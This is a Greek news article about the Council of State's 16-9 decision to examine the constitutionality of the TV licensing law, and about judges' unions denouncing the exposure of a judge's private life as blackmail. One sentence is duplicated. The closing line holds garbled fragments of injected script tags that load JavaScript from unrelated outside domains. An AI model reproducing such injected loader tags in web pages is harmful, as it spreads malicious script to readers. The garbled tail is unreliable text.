Σε τεντωμένο σχοινί συνεχίζει το Συμβούλιο της Επικρατείας

http://content-mcdn.ethnos.gr/filesystem/images/20161012/engine/newego_LARGE_t_1101_54881949_type13145.jpg

ΚΡΙΝΕΤΑΙ Ο ΝΟΜΟΣ ΓΙΑ ΤΙΣ ΑΔΕΙΕΣ

Στην ουσία της υπόθεσης περνά πλέον το Συμβούλιο της Επικρατείας, για να εξετάσει σε επόμενες διασκέψεις (που ίσως χρειαστούν λίγες εβδομάδες) τις ενστάσεις αντισυνταγματικότητας που έχουν υποβάλει οι τηλεοπτικοί σταθμοί για τα ζητήματα της αδειοδότησης.

Σύμφωνα με πληροφορίες, ύστερα από μία έντονα φορτισμένη διάσκεψη (λόγω και του νοσηρού κλίματος που έχει διαμορφωθεί το τελευταίο διάστημα) σχεδόν τεσσάρων ωρών, οι δικαστές του ΣτΕ στην κεκλεισμένων των θυρών συνεδρίασή τους έκριναν (με πλειοψηφία 16-9 ψήφων) ότι πρέπει να αποκρούσουν τα τυπικά νομικά ζητήματα που είχαν τεθεί για την πρόοδο της δίκης και συνεπώς να προχωρήσουν στη διερεύνηση των συνταγματικών προβλημάτων.

Αντίθετα προς την εισήγηση, που ζητούσε να απορριφθούν οι προσφυγές σε αυτό το στάδιο για διάφορους νομικούς λόγους (σχετικά με το εάν μπορεί να κριθεί η συνταγματικότητα μέσω της προσβολής της προκήρυξης του διαγωνισμού, εάν έχουν τα κανάλια εξ αυτού του λόγου έννομο συμφέρον για συνέχιση της δίκης κ.λπ.), η πλειοψηφία των δικαστών δέχθηκε -σύμφωνα με πληροφορίες- ότι, με βάση τη νομολογία που έχει διαμορφώσει το ΣτΕ, οι προσφυγές αυτές θεωρείται ότι είναι παραδεκτές και επομένως μπορεί να εξεταστεί η ουσία τους.

Για την επίλυση των συνταγματικών ζητημάτων θα χρειαστούν ασφαλώς μερικές διασκέψεις, αν κρίνει κανείς από το γεγονός ότι και μόνο για τα (κομβικής, πάντως, σημασίας) τυπικά ζητήματα απαιτήθηκαν συζητήσεις σχεδόν 14 ωρών μέχρι να φτάσουμε στην τρίτη (τυπικά, πέραν της διακοπείσας) και? φαρμακερή διάσκεψη, όπου δόθηκαν οι συγκεκριμένες απαντήσεις, όπως είχαμε προβλέψει με βάση την πλειοψηφία των σχετικών γνωμών που είχαν διατυπωθεί στις έως τώρα διασκέψεις.

Εισηγήσεις
Κατά τις ίδιες πληροφορίες, στο τελευταίο διάστημα της χθεσινοβραδινής διάσκεψης, ο σύμβουλος Επικρατείας Γ. Παπαγεωργίου άρχισε να αναλύει στους υπόλοιπους δικαστές την εισήγησή του επί της ουσίας, που θα ολοκληρωθεί σε επόμενη διάσκεψη, την οποία θα προσδιορίσει και πάλι την τελευταία στιγμή ο πρόεδρος του ΣτΕ, Ν. Σακελλαρίου.

Μολονότι η εισήγηση δεν τελείωσε, πληροφορίες αναφέρουν ότι θα ταχθεί υπέρ της συνταγματικότητας του νέου νομοθετικού πλαισίου και της διαγωνιστικής διαδικασίας, θέση την οποία πρόκειται να αντικρούσουν ωστόσο αρκετοί, που -όπως έχει ήδη διαφανεί- ασπάζονται την άποψη ότι υπάρχουν συνταγματικά προβλήματα, λόγω του παραγκωνισμού του ΕΣΡ (ως καθ’ ύλην αρμόδιας Αρχής για τη διαδικασία) και του περιορισμένου αριθμού αδειών και της αιτιολογίας που τον στηρίζει.

Επειτα από μία έντονα φορτισμένη διάσκεψη σχεδόν τεσσάρων ωρών οι δικαστές του ΣτΕ στην κεκλεισμένων των θυρών συνεδρίαση έκριναν (με πλειοψηφία 16-9 ψήφων) ότι πρέπει να προχωρήσουν στη διερεύνηση τω
Επειτα από μία έντονα φορτισμένη διάσκεψη σχεδόν τεσσάρων ωρών οι δικαστές του ΣτΕ στην κεκλεισμένων των θυρών συνεδρίαση έκριναν (με πλειοψηφία 16-9 ψήφων) ότι πρέπει να προχωρήσουν στη διερεύνηση των συνταγματικών προβλημάτων

Στη διάσκεψη συμμετείχαν οι δύο αναπληρωματικοί σύμβουλοι Επικρατείας, καθώς ισάριθμοι συνάδελφοί τους, τακτικά μέλη της σύνθεσης, αντιμετωπίζουν σημαντικά προβλήματα υγείας (καρδιακό επεισόδιο, κάταγμα) και σε περίπτωση εμφάνισης νέου αντίστοιχου προβλήματος σε επόμενη διάσκεψη θα πρέπει κατ’ αρχάς να αναβληθεί (λόγω έλλειψης άλλων αναπληρωματικών), ενώ εάν αποδειχθεί αξεπέραστο σε εύλογο χρονικό διάστημα, υπάρχει κίνδυνος ματαίωσης των επόμενων διασκέψεων, πράγμα που σημαίνει επανασυζήτηση της υπόθεσης σε νέα δίκη από την αρχή.

ΔΙΚΑΣΤΙΚΕΣ ΕΝΩΣΕΙΣ
«Κάποιοι προσπαθούν να εκβιάσουν το ΣτΕ»

Με ιδιαίτερη «σκληρότητα» αντέδρασαν οι δύο μεγαλύτερες δικαστικές ενώσεις της χώρας για τη δημοσιοποίηση στοιχείων της ιδιωτικής ζωής στελέχους του Συμβουλίου της Επικρατείας (που μετέχει στις κρίσιμες διασκέψεις για τις τηλεοπτικές άδειες), εκφράζοντας «αποτροπιασμό και εξαιρετική ανησυχία για την κατάντια στην οποία διολισθαίνουν τα δημόσια ήθη» και καταγγέλλοντας «προσπάθεια εκβιασμού του Ανωτάτου Δικαστηρίου».

Η Eνωση Δικαστών και Εισαγγελέων και η Eνωση Διοικητικών Δικαστών σε κοινή ανακοίνωση τονίζουν: «Με δημοσιεύματα που δεν έχουν να κάνουν με το δημόσιο συμφέρον, τη λειτουργία της ενημέρωσης και την εξυπηρέτηση της αλήθειας, η ιδιωτική ζωή ενός ανθρώπου, δικαστή εγνωσμένου κύρους, υποκλέπτεται, διαστρέφεται και προσφέρεται βορά στον καραδοκούντα κίτρινο Τύπο και στο μέρος της κοινής γνώμης που διαμορφώνεται από αυτόν», κάνοντας λόγο για φαινόμενο «άκρως νοσηρό, που συνδέεται με μεθόδους που μετέρχονται φασιστικά καθεστώτα».

Παράλληλα επισημαίνουν (συνυπογράφουν ο εφέτης Παν. Λυμπερόπουλος α’ αντιπρόεδρος ΕΔΕ, αναπληρώνοντας τον απουσιάζοντα πρόεδρο, και η πρόεδρος Εφετών ΔΔ, Ειρ. Γιανναδάκη) ότι «η συντελεσμένη ήδη βάναυση προσβολή στα ήθη και στον πολιτισμό της χώρας πρέπει να βρει άμεση απάντηση τόσο στον ποινικό νόμο όσο και στη συνείδηση των πολιτών».

Διαπλοκή
Οι εκπρόσωποι των Ενώσεων υπογραμμίζουν ότι «στην προσπάθεια εκβιασμού του ΣτΕ, όπου εκκρεμούν μείζονος σημασίας υποθέσεις, επιστρατεύεται το συνηθισμένο όπλο στη φαρέτρα μιας ακόμα μορφής διαπλοκής (κίτρινη δημοσιογραφία – οικονομικά ή και άλλα συμφέροντα) για την ικανοποίηση άνομων επιδιώξεών της».

Ταυτόχρονα θεωρούν «αυτονόητα επιτακτική και αναγκαία την άμεση αντίδραση της πολιτείας και κατεξοχήν της Δικαιοσύνης, στη δημοσιοποίηση στοιχείων της προσωπικής ζωής δικαστή του ΣτΕ, που τυγχάνει, όλως συμπτωματικά, εν προκειμένω, να συμμετέχει και στη συνεδρίαση σχετικά με τη συνταγματικότητα των νομοθετικών παρεμβάσεων στο τηλεοπτικό τοπίο».

Τέλος, με αφορμή παραγγελία του υπουργού Δικαιοσύνης για έρευνα, που ασφαλώς δεν άπτεται της συνταγματικά απαραβίαστης ιδιωτικής ζωής, εκφράζουν την πεποίθηση ότι «τα αρμόδια όργανα της Δικαιοσύνης θα ενεργοποιηθούν με την πρέπουσα αμεροληψία, νηφαλιότητα και μυστικότητα, όπως αρμόζει και ορίζει ο νόμος».___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >